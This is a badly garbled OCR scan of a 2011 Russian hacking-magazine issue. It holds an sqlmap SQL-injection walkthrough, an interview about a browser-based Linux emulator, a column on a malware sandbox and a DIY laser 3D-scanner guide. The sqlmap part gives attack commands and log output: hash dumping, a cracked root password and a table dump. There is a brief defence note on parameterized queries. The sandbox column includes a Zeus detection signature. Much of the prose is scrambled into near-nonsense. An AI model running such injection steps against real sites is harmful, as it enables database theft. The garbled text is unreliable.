(INFO] fetchiпg baпner
(INFO] actively fingerprinting MySQL
(е2:е8:27] (INFO] e xecutiпg MySQL comment injection fingerprint
[е2:е8:27]

web

apglicatioo~technolog}": РНР

0.2.6.

Apв.
a ""
chwe"--<c
0 "..
.2"-"·"9 _ _ _ _ __

ХАКЕР

00 / 053/2 011

Sqlmap, тож SQL-инъекции-это несложно

0:/.g_ck:end J)f1.MS ~~~:tive._fi_Qggr_l)rin:t: 01y~QL__ >=5.],~12_ашL<. 0__,.5.0___ _
comment injection fingerl)rint: My_S_Q.,_L~Sc...,._1.,_,4".1~------____I;Ja nne_r__l)a rsingJinggд1rin:t ~C1y_S_Ql.2,1,4;1________________
banner:

"5.1.41-3-Ьро50+1"

После- отчество текущего пользователя:

+- ------------ -+
Datab~testd~
[ 0 tаЫе],

[02 :08:28] [INFO] fetching-"c""u"rrue._,_n,_"t"-"u.._.s".eLr _ _ _ _ _ _ _ _ __
current user_:

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __

+-- ------.: .--- -+._____________________ _
l_users_ _ _l
+-------------+

Далее получаем хеш да всех пользовательских жете ролей равно выполня­
ем брутфорс-атаку за словарю:

[02 :08 :,15] [INFO] Fetched dat~gged to text files under "/optL_
sg lmaJ)/outl)ut L~


W~
. s~i~
t~

.c~o""
m~
· ---------------

[02:08 :28]_[Ii"<FO] fetching database users 02assword hashes
Готово!

gq_y.Q!J_w_<~nt_tq щ~rform_<UJ:lctionary:_based att<~.e_lu!g<!iл.:;:t _r etrj.~~

password hashesl_[Y/n/q] У
[02 :08 :30] [INFO] using h_<~sh method "mysql_passwd "
what dictionary do you want to use?
[02 :08 :32] [INFO] u__:;;ing_deff)ul:!:.Jjictionary
[ 02 :08 :32] [INFO] loading dictionary_fur_".o""m_ _ _ _ _ _ _ _ __
__"/_qp_:t i.:;g lmapД_>G;L~ ord :Ц_:;_t . txt
_"_______________________ _
QQ_y_qu want to use common_pass_word s_uffixes? (slow!) [y/_N] _N__
[02 :08 :33] [INFO] starting dictionary-based cracking (mysql_passwd)
[02 :08 :35] [INFO] cracked password "testpass " for user " root"
database management system users password hashes:
[ * ] deЬian-syJ;-m_~int [1]_;_ _ __
__Qas sword hash: * 0B2C58EAB091C17760A223B088B601604F898847
[! ]_root [1];
password hash: *00E247AC5F9AF26AE0194B41E1E7690EE1429A29
clear-text password: testpass
Оп а! Для гооt " а ты да я бурно подобрали параль !для примера возлюбленный был
аспидски простой) . Пришло пора сдампить интересующие получи и распишись из данные:

[02:08:35] [INFO] fetchin~;g-"d,.,at.,.a""b""as,.,e"-"n""a""me"-"s,__ _ _ __
[02:08:35] [INFO] fetching taЫes for databases:
information_schema, mysql, owasp10, testdb
[02 :08:35] [INFO] skipping system databases:
ioforma:tion_scheП@,_mysqL _ _ _ _ _ __
Database: owasp10,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __
[ 0 taЫes]

КАК ЗАЩИТИТЬСЯ?

СЦЕНАРИЙ N2 З
Теперь, обнаружив на базе данных tеstdЬ-таблицу 0-О testdb) со интерес­
ным именем <<users>> 0-Т useгs), мы, естественно, заходим приобрести

ее начинка себя 0--dump). Но дай тебе по части показывать до сего поры одну интересную
опцию, безграмотный будем имитировать по сию пору причина без затей во файле, а реплициру­
ем предмет таблиц на основанную возьми файлах базу данных 0Qlite нате

локальной машине 0--гeplicate).

$ python sqlmap.py -u "http://www.site.com/vuln.phR?id=L___
--random-agent --tor --dum12 -D tes_"I;QQ_- Т users..=reR_.l,.,ic
,_ .,_,a..,t,_,e,____ _
Сканерунесоставиттрудаопределитьназваниястолбцовдля

таблицы useгs да что плохо лежит изо нее весь записи:

[02 :11:26] [INFO] fetching columns for tаЫе "users" on database
" testdb"
[ 02 :11:26 ]_[INFO] fetching entries for tаЫе "users"
__:_tg~j;Q!L _____________________________
D_<~tabase:

testdb________

TaЫe:__]J__:;er L

[4 entries]
+--- -+-- ---- --+- ---------- -+
l__jJL_I name
0 surname

±.::.:..::.:.+- -- -.: .: .::: +--- --=-=-=-=
±-----------·-·-----------·····---·
.1_2_ 0 f!ufty_ l bunny
0 0 0_wu
0 ming
0 0 0 luther 0 Ыissett
0 0 0 NULL
0 nameisnulll
±.::_:- -+-- ---- --+:::
· _:_
--:.:-:.:·:::·_:_
--:.:·:.:·:::-_:_
-+!:.___ _ _ _ _ _ _ _ _ _ _ _ _ __
_[e2 :11:27 ]_[INFO] ТаЫе "testdb.users" dum11ed to s_glite3 file
Таким образом пишущий сии строки получим дамп базы данных на файле
sqliteЗ во формате

Наиболее надежным способом предотвращения 0QL-инъекций

0Qlite. Фишка

testdb.

во том, который на возле таком раскладе я безвыгодный

лишь только можем взглянуть данные, же единаче равно привести в исполнение для ней любые

является употребление параметризированных 0QL-параметров. К

запросы, заюзав потенциал 0QLite !например, не без; через про­

примеру, на случае не без; РНР сие к тому идет не без; через танцевальный шаг кета PEAR"s 08

граммы 0Qlite Manageг).

l peaг. php . net/package/08 ), предлагающего интерфейс про выполнения
напрочь безопасных 0QL-выражений. Обращение ко БД происходит
следующим образом : $р

РЕЗЮМЕ

=$db->prepare( "SELECT * FROM users WHERE
id=?" ); $db->execute($p, array ($_GET[ "id " ])).Основная рецепт за­

В прошлом номере во рубрике Pгoof-of-concept ваш покорнейший слуга рассказывал тебе

ключается во том, аюшки? разве положение параметров безоговорочно задана, ведь допускается

что до

в полной мере устойчиво передавать5QL-заnросы базе данных , за исключением

0QL-уязвимости. Идея заключалась во том, с целью разбудить эффектив­

возможностьдля параметров самим стать5QL-выражениями lв волюм

ный сканер, который-нибудь склифосовский мирово работать, да войти рядом этом

0555,

небольшом Руthоn-скрипте, тот или иной умеетобнаруживать

числе зловредными). Стоит заметить, чтодругие механизмы, такие во вкусе

во

эксплуатация принудительного приведениятипов !например, не без; по­

0QL-уязвимостей- сие только лишь малая доза дела. Их угнетение

мощью функции intvaiiJ) на связке из экранированием строк такими функ­
циями, в качестве кого mysql_гeal_escape_ stгingl) не так — не то addslashesl), неграмотный являются

000 строчек кода.

Это остающийся однова доказывает, что такое? примечание

-вопрос несравнимо сильнее сложный. Но его будь по-вашему взять хоть получай доверенность

- sqlmap , на

котором наш брат объединили старый эксперимент огромного

ни капельки безопасными. Проблема на том, что такое? существуютнекоторые

количества пентестеров, с целью сканнер был в силах с большой отдачей неграмотный всего только

варианты ради их обхода , а ясно , для их использованию необхо­

отыскивать 0QL-инъекции, а да получать изо сего максимальную

димоподходитьсмаксимальнымвниманием.

выгоду. :В:

ХАКЕР

00 / 053/ 0011

031

PCZONE

Proof-of-Concept
ЗАПУСТИТЬ LINUX
В&РАУЭЕРЕ

То, аюшки? пишущий сии строки увидели одним июльским ввечеру на редакции, впе­

чатлило нас перед глубины души. Зайдя в сайт bellaгd.oгg/jslinux,
я увидели, как бы стойком среди браузера стартует Linux-cиcтeмa,
со которой дозволяется коптеть так, вроде когда бы возлюбленная была запущена подо виртуальной машиной. Сперва нам показалось, что-то сие

не мудрствуя лукаво эмуляторлинуксовой рента равно некоторых никсовых

ЗАЧЕМ ВООБЩЕ ТЫ ВСЁ
ЭТО ЗАТЕЯЛ? РАДИ ЧЕГО ?
Я хотел проделать своего рода Uпi х-по д обную
систему во спринклер ре. Я знаю относительно существовании

проекта JS/U IX l www.m a sswe г k.at/ j s u ix l, же ме н мы
грела концепция что касается потенциал вслед за п ускать во спринклер ре
реальные бина рни ки Uпiх-команд . Изначально
пишущий эти строки только что хотел претворить в жизнь эмулятор пользова­

команд . Но жуть быстро получается ясно, ась? сие полновесный эмуля­

тельского окружения да до конца известить возьми

тор РС, каковой целиком и полностью написан получай JavaScгipt равно выполняется

з н а л , ась? со п омощью сов р еме нны х JS-движков

напрямик на браузере! Можнодаже начертать держи Си использование да от­

пр касательно щ е эмулировать целехонький нейрокомпьютер равным образом уж возьми

JavaScript сердечник системы. Однако п озже автор этих строк осо­

нем начинать полновесный Liпux.

составлять его от через включенного за умолчанию ком­

пилятора

TinyCC. Это нетрудно чума!

Какому крутышуудалось сие

реализовать? Вопросы отпадаютсами собой, если посмотришь

нате копирайты. JavaScгipt РС Emulatoг [а то-то и есть эдак называется
проект] написал Фабрицио Беллард-создатель эмулятора

QEMU. Мы

решили разузнать у него, в качестве кого ему на голову могла начаться

такая безбашенная соображение . РоС получился сверх всяких похвал.

ЧТО В ЭТОМ ОСОБЕННОГО?
Есть масса эмуляторов компьютера, равным образом аз многогрешный во т ом

числе стою у истоков одного с ни х IQEMUI.
JavaScript РС Emulator интересен тем , что-нибудь рабо­
тает на большинст на е б ра узеров да не насчет частностей н е тр е­
буе т установки. Конеч н о, некто примечательно медленнее,
да по сию пору равн по части может ис п ользова ть ся, для примеру , на

образовательных ц елях. П оскольку адрес написан

сверху чистом JavaScгipt "e, спирт может п ос л полоз ить н е­
пл охим бе нчм арком д ля образец а пр оизво дитель ­
а не без; ти JS-движков. Могу сказать, ась? теперь пр по части ­
ект быстрее стартует получи и распишись

Jaeger Мопkеу, какой-никакой

используется во Fiгefox 0, нежели на V81Chromel. Я п ока
далеко не могу об ъ яс нить, на ч ем причин а, п оско ль ку

усик пел ноне изучи ть шифр т олько J aegeг Мопkеу

IФаб рици относительно - форменный гик-монстр . - П ри м.
редакции! .

КАКИЕ С ЭТ И М БЫЛИ СЛОЖНОСТИ?
Самая навороченная доля проекта- зто,

конечно, эмулятор процессара х86. Пр оект зму­

лир доллар т е щ е ря д усик трой со тв !последовательный
п орт, ко революция олле р пр ерыван ий, эмуля т гвалт те р­

подкопа л а!, хотя от процом возни было свыше лишь .
Тут надо что касается п они мать: было бы попроще змулиро­

вать CPU из RISС-архитектурой !какой- ни до скорого свидания
MIPS alias ARM I, а куд а не чета бы л что до бы вмещать
выполнимость ради п ускать наш пострел везде поспел х86 адрес .
Ведь на конечном счете з ведь позволит следовать п ускать да
др у ги е ОС, малограмотный тольк что до Liпu x . Ещ е насчёт дн а со л ожнос ть
состояла на том, чт обы д обиться вежливо й

пр оизводительности эмулятора во спринклер ре

!сейчас цель работает на Fire fox да Chrome l .
Я об нар ужил, ась? кое-какие ко н струк ции
выполняются медл ен н ее, ч ем др у гие во тех а

самых браузерах . П озтому пришлось внушительно

JavaScript РС Emulator Быстрее общем работает на Firefox

032

притирать ко д . ~

ХАКЕР

00/153/2011

PCZONE

Степаня Ильин

ltwitter.com/stepah)

КОЛОНКАРЕДАКТОРА

Про испытание
малвари
а во так хотел обнаружить азбучная истина да мыслительный механизм

на хо ну да на приложения лежит за исключением стандартных секций >>, «За пр а шив ает

к анализа товар вари. И кажется, нашел. В одном с давниш-

от писок запущенных процессов >>, << Содержит долгие sleep"ы (больше

них номеров аз многогрешный уж рассказывал оборона онлайн-сервисы, которые

предлагают метнуть неблагонадёжный бинарник во песочнице равным образом

0 минут! >>, <<Соз дает файлы шофер касательно во >> да беспричинно ниже . Всего на базе Jo e
Sandbox Web не откладывая 060 сигнатурдля а нализа поведения бинарника.

проанализироватьегодействиявсистеме. Д етальностыакихотчетов

Любую с них позволено nодстроить почти близкие нужды. Ничего н е овчинка выделки стоит

поражает: позволяется окинуть взглядом , какие ключи были соз даны на реестре,

наnисать да домашние собст во е нны е си гнат уры, воспользовавшись простым

для каким файлам происходили обращения, какие nерехваты функций

Руthоn-интерфейсом чтобы обработки данных относительно nоведении программы.

выполнялисьитакдалее.Некоторыеизтакихсервисовавтоматиче­

Приведу ради примера ча со ть не без; игнатуры ради анализа Zeus"a, от через

д

скиделаютскри ншотприло женияипредла гаютполны йдампсетевой

которо го наша сестра обучаем сканнер чувствовать нате типичны е пользу кого сего троя

ядро однако сти исследуемого приложения на РСАР-формате. Всему этому

соз даваемые файлы :

х озяйству далеко не хватаеттолько одного- некого интеллектуального

механизма, какой-никакой был в силах бы далеко не только лишь расходовать сухие материал , однако
до этого времени равно трактовать их. То, что-что пишущий эти строки такдавно хотел, моя особа обнаружил
ненароком на сервисе швейцарского исследователя Стефана Бюльмана.

zeusfiles=(..".k:_"Llwindowsl.l~stem32 "Ll ntos. е х е" , \._ _ _ _ __
[ . .. nропушено ... ]
"c:\~windows\\system32\ \ lowsec\\user.ds" ]

Его исследование -Joe Sandbox Web ( www.joese c uгity. oгg l-тaк же,
по образу да многие часть сервисы-песочницы, возвращает тончайший
отчета поведении файла во системе, да со важным отличием. За цифирь
интеллектуального механизма автосканер понятным языком говорит по части пирушка

активностибинар ника ,котораявызывае тnодо зре ния. «Инжектирует
РЕ - обложка на чужеземный движение >>, « Перехватывает требование winsосkеt-функций
для того перехвата трафика>>, « Открывает речные ворота равно ждет во ходящи х подклю­

ч е ний >>, «Устанавливает хуки интересах функций, выводящие каталог файлов

def sig!]@tch(data):
if data(_:_t.un.C.]=="fileCreated" :
__ i f ctataj_:"_~J;atus "JJjлg(~ц!";..c_~s_::J..J-=._:J .;______
_ _...:#"-"-"
Прове):1яем,_п_g_падают ли_со;1данные файлы во блек-лист
for zeusfile in zeusfiles:
if data[ "path" ] .lower()==zeusfile :
zeusdetected=True

равным образом директориЙ >> - на мнение попадают конкретные да ясные формули­
ровки , понятные человеку, что объединение роду деятельности как всегда малограмотный
зан имается анализом жмет вари. Все перипетии упорядочивание у ются объединение степени

_ elif data[ "func" ]=="httR~"~"-------------------­
if~eusdetected:

оп асности . Я nеречислил кое-кто с в отдельности подозрительны х. Н в рассуждении убирать

#Извлекаем IР-адрес С&С-сервера

равно часть маркеры, сверху которые присутствие анализе овчинка выделки стоит преобразить внимание,

if re.match( r "POST.*gate\.php" , data[ "request" ] , re.I):
zeusservers.append(data( "dstip" ])

нокоторыенеобязательносвидетель вместе с твуютозловредномхарактере
приложения . Н а пример: « Отправля е т показатели для ве б - се рвер >>, «Точка

Вообще подобная ра со ш иряемость дает Joe

Sandbox Web сто очков

вnеред п ере ддр угими конкурентами . Еще одной киллер-фичей
является как будто вместе с ть исnользования Autolt-cкpиnтoв, с намерением оnре­
д е струить дей со твия, которые должны nрои схо дить изумительный эпоха анализа
малвар и. То ест ь позволительно толково автоматизировать что ни придется взаимодей­
что до

er..t. • mutex to .-gnloo lnfected hoot8

по части

Pwformo DNS lookupo

по части

Contolnolongol-• (< 0mln)

в рассуждении Р8
по отношению

fllo eont81м иdloll8 wlth ........e.ndordlntrypolnt 01• oul81dellt8nd..t иdlом

от твие из системой равно nрило жениями (браузингопределенных страниц,
загромождение форм , установку прило а ния да таково далее! . Тут полагается
nони мать: многие изо д ействий малварь выnолняеттолько во случае
вот з никнов е ния определенных событий . К nримеру, банковский т огромное количество

может комплектовать показатели форм токмо рядом nо се щ ении пользователем
определенны х сайтов.Сервиспозволяетобработатьподобнуюси­
туацию . С nомощью nро из того скрипта пишущий сии строки можем унаследовать никак не nр осто
отчетотом,что прои схо дитв со истемепослезапу ска равным образом сс ледуемого

приложения, а равно нерушимый оценка того, ась? прои сходит nри возникно­
вении обозначенных вместе с обытий. Сценарии позв оляют е ще равным образом у nр авля ть
анализирующим движком : для nримеру, соз д авать nри необходимости
скр иншот экрана не так — не то включ а ть на нужном месте снифер для того перехва­

та трафика. И зто всего лишь малая делянка возможностей

Joe Sandbox Web.

Правда , во бесплатной версии сервиса они доступны малограмотный все. А с целью
получения инда дьявол пл атного эккаунта придется начертать число «пи» сьмо его
Разные цвета-разные степени опасности событий

ХАКЕР

00/153/2011

соз дателю. К счастью, отвечает спирт быстро. Х

озз

PCZONE

ЭдуардГузь

00-сканеR
следовать 00

КАКСОЗДАТЬ
0D-МОДЕЛЬ
ЛЮБОГО ПРЕДМЕТА
ПОДРУЧНЫМИ
СРЕДСТВАМИ

О 0D-СКАНИРОВАНИИ
М н что до г ие окружение н а ш ей ж равно зн да н ем ы от л им ы минуя т рех м е рн ой г ра ф ики.

О г ромная а р ми ваш покорнейший слуга 0 D -мо мол лл е р ов (ил равно п что касается для из т у 0 D " ш нико вl еже дн ев н касательно
соз д ае т мо д ели , ко т орые п отом побег п е шн насчёт ис п насчёт ль зую т ся во са наша сестра х ра з ны х

об л астях, начи н ая по отношению т ки н ема т касательно г рафа, р ек л амы, п кашаса ышл е нн насчёт г в рассуждении п ро­

разновидность из тв а, архитек т уры равным образом зака нчи вая ибо г з н ает ч ем е щ е . Л юбой че л по отношению ­
во ек, после н имаю щ ийся мо д ели р относительно ван ием, р а н по отношению не в таком случае — не то п эскер дн насчёт от тал кивается
со вместе с л е дую щ ей вслед за д ачей: н полоз н по отношению соз д ать м од е л ь т по отношению го, ч ведь уж су щ ествует

во н а ш ем тр ехмерном мире. Это можетб ыть ч т по части у г в отношении дн о. Н а п риме р ,
мо д е ль - пр с оти п , которую сверху т крик от так л п оложи л запрет чи ко да п что касается п роси л

вместе с д е л а ть <<то чн что до круглым счетом же, ведь ль ко на кусок пь ю т ере>>. Пр да ч е м из мод е л иро на ать
н медянка н по отношению н е пр осто ч т об ы « б ыл касательно п охоже>>, а чт об ы об ъ ек т-пр об тотип равным образом
тр ехме рн ая мо д е ль б ы ли ко а ко б л изо нецы- б р а тья , р аза д е л е нны е экра н ом
кусок пьют е р а. Так из л у чил центр равно со м н ой. Вып по отношению лн яя что до ч е р е дн ой индент п по части
мо д е л иро во а н ию, аз многогрешный сто л кнул со моя персона со что касается ч е нь жес тким равно тр е б что касается во а ни ями п по отношению со ­

Профессиональный 0D-сканер,
из через которого дозволено

оцифровать настоящий объект,
получив его компьютерную
модель, есть расчет десятки тысяч

долларов . Мы но сможем про­
отозвать так но самое вместе с через

специальной программы, лазер­

утнапиштим указки равным образом веб-камеры. Всего
долларов следовать тридцатник .

031.

насчёт тв ет ств да ю моей м од е л равно об р я ц у ко ли е нт а. П ос л е э нн что до го б езус п е ш да го
На сайте единожды работ·

со гл асова ния со та л по части автор этих строк не без; н об , ч ведь во эт по отношению т р а з н стрела-змея н а абсо л ю тн а моя особа т по отношению чно со ть

чикa www.david­

мо д е л и. В касательно во не без; аз многогрешный кусок вместе с л у ч ае ко ли е нт б ыл у во е р е н , чт относительно на пр относительно тивн ом вместе с л учае

laserscanner.
com питаться красота

есть л да равным образом н е н бог т у п да т Арма г е дд что до н ради во се го че л по отношению на е ч есть тв а, т в рассуждении п об для ра й н ей

справочник бери рус­

мере из л учи т от ваш покорный слуга ч т насчёт -т об п охожее. Чт что до м н е ос т а банкет ос ьд е л а ть? П в рассуждении пр в рассуждении ­

ском языке . nрочти
его обязательно!
Там жуть со всеми подробностями
описаны да требова­
ния ко оборудованию,

ибо на а ть , возьми ко н е ц , 0 D- ск ин равным образом р в отношении во фактически равным образом е ! Я так гд а е щ е п что касается д ума л: «Э т что до а

равно последователь­

об чень потому что льши х. Чтоб ы е г что касается ку п равным образом ть, автор впредь до л но н был у мн ожи ть из т оимост ь

ность сканирования,

мо делир насчёт во а н ие дл ваш покорнейший слуга л е нивы х>> . Мин у та д е л а - равным образом на сё, мо д е ль г относительно ведь ва ! К

мое м у на е л икомууд да вл е ни ю (и ра зо ча ро ванию! , ок а з ал ос ь , чт по части д хоть е
са я й п рос те нь для да й 0 D- ска н ер из тоит потому что льши х д е н е г. В е рн ее го во насчёт ря ,

да различные нюансы ,

эт ой мо мол л равным образом н а ч ис л об из пятью ю н улями . Н относительно р аза н е ль з автор ку пить, з сверху чи т,

которые могут у тебя

буд ем д е л а т ь сами. Н иже аз многогрешный хо ч у п об дескать плескать ся из т о й насчёт пытом, во вкусе мож н об

проглянуть .

соб р а ть 0 D -ска н ер домашние м да рукам равным образом . Я н е т что до ль ко ра сскажу, для а кие комок п о­
отнюдь не нты равным образом гд е ку беспробудно д л автор этих строк э т что касается г относительно , н в рассуждении равно по образу сим ск практически е р что касается м п по отношению ль зо на а ть ся.

ХАКЕР

00 / 053/ 001 0

0D-сканер ради $30

Чтонам
понадобится?

ЛАЗЕРНЫЙ МОДУЛЬ
Д ля работы сканера необходим кусок ­
понент, кой довольно даватьлинию.
Именно линию, а н е точку. Это важно! Н а

форумахяпро ч е~чтопо д ойдетобычная
китайскаялазернаяуказка,нозтоне

так. Как бы быстроты ни нет слов д гиттия рукой,

Смастерить родной 0D-сканер , наравне оказалось,

вооруженнойлазерной указкой, сие

не возбраняется текстуально изо подручных материалов :

всё никак не то. Чуть спустя некоторое время автор объясню почему.
Сейчас имеет большое значение одного-нужен ска н ер,

нам потребуется специальная содержание , ла­

зерная указка, веб-камера , а тоже кой-какие
самодельные оборудование .

DAVID"

СПЕЦИАЛЬНЫЙ СОФТ

кото р ый дает линию. Красный, зеленый,

синий-цветсканера безграмотный важен . Вообще позволительно привыкать равным образом безо сканера ,

воспользовавшисьальтернатив н ыми решениями !читай вот врезке) . Но
лазеровый модул ь-это совер ш енното чн в отношении самый азбучный равным образом досту пн ый

вариант. Я приобрел узел красного лазера 050 н М со фокусировкой
контуры мощностью 0 м Вт, дьявол стоил 05долларов. Такой позволяется сметь идеже

Самой важной отчасти сканера, во книга

угодно, н а п ример во хозяйст во енном магази н е либо — либо после да нет, в духе сие

числе дорогостоящего профессио­

ес ваш покорнейший слуга !кажется , во www . gгeeпlaseг. com . ua ) . Модули большей мо щ­

нального, является его мозг- про­

ности !до 00 м Вт) никак не рекомендую приобретать, эдак что их исчерпание

г раммноеобеспечение,которое

умно на оче н ь редких случаях. Е сть готовые модули из автоном ­

выполняет оцифровку. То, что такое? необхо­

ным питанием -если найде ш ь, так ку п да отпустило таковский . Мне а в целях своего

димо нам,- сие инструменты, которые

лазерного модуля пришлосьсоздать небольшую оснастку, ради было

фальц требование полуют скан равным образом ровать/оцифро вы­

удобнодержать во руке, включать/выключать. За п италя его обычной

вать трехмерные объекты от через

кроной 0 В : пунцовый фидер <<+ >>,черный <<->>: разве наоборот, в таком случае бросьте

подручных средств: веб-камеры равно

обогреваться и, на правах результат, выйдет изо строя первоначально времени.

лазерной указки. Таковыми являют-

ся DAVID-Iaserscanner l www . david-laseгscaппeг.com ) да TriAngles
l www.intгicad . com ), доступные про свободного тестирования, хотя из

КАЛИБРОВОЧНЫЙ УГОЛ .

некоторыми ограничениями. Последний имеет порядком неприятное

Ориентироваться на пространстве,

в рассуждении г раниче н ие: д ля е г по отношению рабо т ы необхо д им р авномерно во ра щ ающийся

столик. в котором буд ет рас п олагаться сканируемый объект. К тому
а предъявляются суровые спрос для самому объекту. Его характер

должна составлять б л изка для цилин д рической, а е щ е лучше-сферической.

п олу ч ая мочь считывать

величина изображения, позволяет
программе специальнаяприспосо­

ба- калибровальный уго л . Не бойся,

DAVID-Iaseгscanneг подобныхтребований отнюдь не предъявляет, потому

сие самый третьесортный кусок п касательно н ент,

мы выбрал его. Несмотря в в таком случае что-нибудь утилита платная да ее достоинство

представляющий собою двойка листа со

колеблется в рассуждении т 099 по 029 евро, т yes т ировать ее не запрещается как нужно

из п е ц иально нанесенными маркера­

целую вечность -лимитов до времени нет. Единственное предел заклю­

ми, которые нужно поместить лещадь

чается на особенностях сохра н ения результатов сканирования . Сохра­

домиком 00 °. После установки DAVID "a твоя милость

волоконце сканы можно, н в отношении на низком качестве. В п рочем, получай просторах Сети

найде ш ь файлы на формате PDF тож CDR во кор н евом каталоге, напри­

равным образом н огд а случаются чудеса, равно сделал л равно тебе болт астся отыскать версию DAVID"a,

мер << Cali bp oiпts_Scale30 _ D IN _ A4.pdf >>. Или со аналогичным именем,

которая сохраняет во высоком качестве, значит, твоя милость сэкономишь да для

а на формате CDR к печати с CoгeiDгaw . Выбери оный файл, слово

этом . А кто именно равно щ ет-тот всякий раз найдет.

которого соответс т вует формату бумаги , получи ко т орой твоя милость собираешься
п ечатать . Вообще советую литься через размера сканируемого объек­
та . Не от тоит свершать внушительный угол, ежели твоя милость собираешься просматривать

ВЕБ-КАМЕРА

маленькие объекты. Д ля основные принципы радикально подойдут калибровочные

П араметры объекта, необхо д имые

листы фо р мата А4. С л ожнее укрепить их до д п равильным углом. Свой

на составления объекта, утилита

основной пристанище аз многогрешный есть так- прямо согнул снег гофрокартон , закре­

считывает со через веб-камеры.

пил его возьми основе, по прошествии что прикрепил рубеж на граница калибровочные

О н а, возмож н о, у тебя есть. Е сли приближенно ­

листы. Л уч ш е их малограмотный для л еить, т ак каклисты ста н ут волнистыми -э т что касается

прекрасно, можешь попытаться

непозволительно . Вместо сего не возбраняется прилежно пришпандорить их по мнению краям

обтяпать всё не без; ней . Главное, ради

скотчем. Д олжен сказать, аюшки? потом п ервых а сканов из чего можно заключить понятно,

уполномочивание было безвыгодный больше 040 х 080.

в чем дело? пеленг неграмотный идеальный. П оэтому присутствие ш лесной великан всё п ереде л ать: автор сое д инил

Е сть равно д ругие спрос : наличность

двушник куска ДСП , скрепив их у г олками. Получилось хорошо: крыша над головой 00°,

прирученный фокусировки !возможности

зеркало без упрека ровная- лишь сего запрещается было бы вынудить

отключа т ьавтофокус), на аховый конец шумов

их соединимость со DAV ID можем всего только пишущий сии строки от тобой, вследствие чего доверимся

-

около высоком разрешении, качественная кабошон камеры -линза безграмотный

должна всучать сильных искажений. Камера должна приспособляться

ко USВ-порту да сидеть получай WDМ-драйверах lт. е .• п опросту говоря,
должна оказываться видна д ля выбора на прог р амме DAV ID) . Боль ш да н ство со­
временных веб-камер удовлетворяютэтим требованиям, да опробовать

из г офрокар т оном.Словом, т утестьм н ожествовариантов.

НИ В КОЕМ СЛУЧАЕ НЕ НАПРАВЛЯЙ ЛУЧ ПРЯМО В ГЛАЗА.

ЭТО ОЧЕНЬ ОПАСНО, ТАК КАК ЯРКОСТЬЛУЧА НАСТОЛЬКО

рекомен д а ц иям соз д а т е л ей п рограммы кайфовый уклонение всяких неожи­

ВЕЛИКА, ЧТО ДАЖЕ КРАТКОВРЕМЕННОЕ ПОПАДАНИЕ В

данностей . Из мол ш евых камер лично построитель рекомендует Logitech

ГЛАЗ МОЖЕТ ВЫЖЕЧЬ СЕТЧАТКУ ГЛАЗА. ПОПАДАНИЕ НА

WebCam Рго 0000with cam holdeг, которую допускается выкупить д олларов вслед
из т о. Я но усище п еш н что касается ваш брат п олня л ска н ирова н ия моей Log itech С270 стоимо­
стью вблизи 05 долларов .

КОЖУ НЕ ОПАСНО. ВООБЩЕ РЕКОМЕНДУЮ ПРИОБРЕСТИ

ХАКЕР

00 / 053/2011

СПЕЦИАЛЬНЫЕ ОЧКИ ДЛЯ РАБОТЫ С ЛАЗЕРОМ, НО ЭТО УЖЕ
ПОТОМ, А НА ПЕРВЫХ ПОРАХ МОЖНО И БЕЗ НИХ.

035

PCZONE

Какэто
происходит?
Теперь самое интересное - присутствие от т упаем ко самому пр оцессу ска­

нирования. Оглянись вокруг: на комна т е беспременно найдутся какие­
нибудь сувениры иначе говоря ста т уэтки -дл автор экспериментов подойдет
произвольный куцый объект. Чт в отношении верно неграмотный годится, что-то около сие прозрач ны е
иначе говоря п олупрозрачные nр е дме ты. Л уч лазера долженствует отражат ь ся, а безграмотный

поглощаться предметами . Созда т ели DAVID "a рекомендуют на т аких
случаях усеивать nредметы тальком иначе , разве далеко не жалко, аэро­

зольной краской. Я неграмотный утруждал себя равным образом взял серия статуэток.
Условно на процессе скани р что до на а н ия мож н что до сделать упор цифра каста п а,

расскажу по отношению каждом п что до д робнее.

Сканирование: со светом равным образом без участия

0 ЭТАП
всё от д ела н касательно nравильно, пр насчёт гра мма согласно э др ави тте бя, аюшки? кали б буерак ка

Калибровка

пр ошла усик п ешно. В пр что до ти во н ом вместе с лучае позволяется попроб об вать реформировать

Это подготовительный каста п, п оэтому объек т с целью не без; канирования временно

месторасположение во еб-камеры, поиграться из яркостью да кон тра стом. У меня

отложим во сторону. Закрепивеб-камеру вопреки калибровочногоугла

получилось безграмотный не без; п ервого раза, хотя попозже радости было равно как п осле первой

таким образом, воеже всё-таки компоненты были неподвижны относи­

вместе с данной сессии!

тельнодругдруга.Камерустоитрасположитьнауровненижнегокрая

калибровочных листов. Во минута калибровки камеры картина
подобает состоять ярким . Я выполнял ска нир ование вечере тож днем, да

0ЭТАП

со затененным окном, а тарировочный вершина осве щ ал искусствен ным

Размещениеобъекта

светом . Сама калибрование осу щ ест вл яется во DAVID-I aseгscanneг.

Дл автор скани р ова ния нельзя не разместить объек т во у гл у калибровоч­

Выбираем изо от 3 ска усик трой ст на свой у веб-камеру, н аст раива ем изо­

н ого угла . Для лучшего результата касательно н д по части л жен состоять рядом близи т е льн в рассуждении п что касается ­

браже ни е : п овы ш аем яркос ть, контраст. В результате получи и распишись как ране видны

сере дин е калибровочных ли стов . Е из ли е го размеры небольши е, позволено

токмо черные маркеры. Жмем кно пк у << Калибровать камеру». Е со ли

пускать в дело подставку: коробку, книги, д ере во моя особа нны й пунсон под­
хо дящ его размера. Укажи пр ограмме образец используемого лазера. Д а л ее
тушим от вет ! На экране д олжно бытовать сумрачно . Если далеко не эдак - понижаем

С OAVID· Laserscanner

!

значения яркости. Н е пугайся, разве маркеров безграмотный видно: пр ограмма

з апомнила их расположение, равным образом в настоящий момент они нам отнюдь не в такой степени важны. Включи
пролаз е р да направь его в пристанище хоть сколько-нибудь вне нашего nредмета. На экране

должна показаться ломаная белая головка абрис [программа анализирует
черно-белое изображение) . Расстояние в кругу камерой равно пл оскостью
лазера [т. е . триангуляционный угол) нужно состоять до экой степени цисталгия шим ,
елико сие возможно, - сие нужно к прозопальгия ш ей точн ости. Иначеты

увиди шь предупреждение: « У г ол пересечения из лиш комок не лезет >>. В нач але

~ Изменитьс:рорt11ат

J

статьияотговорил т ебяотис п ользова ни яточеч н ой ла зернойуказки,
равным образом видишь поч ему. Да а быст р об изумительный д пишущий эти строки т в отношении ч ечной указкой, твоя милость безвыгодный тольк об н е по­
лучишь ровную линию, н об да пр ограмма н е сможет до от чи та ть величину
триангуляционного у гл а.

Моаитоб (мм):

00.00

ЗЭТАП

Сканирование.
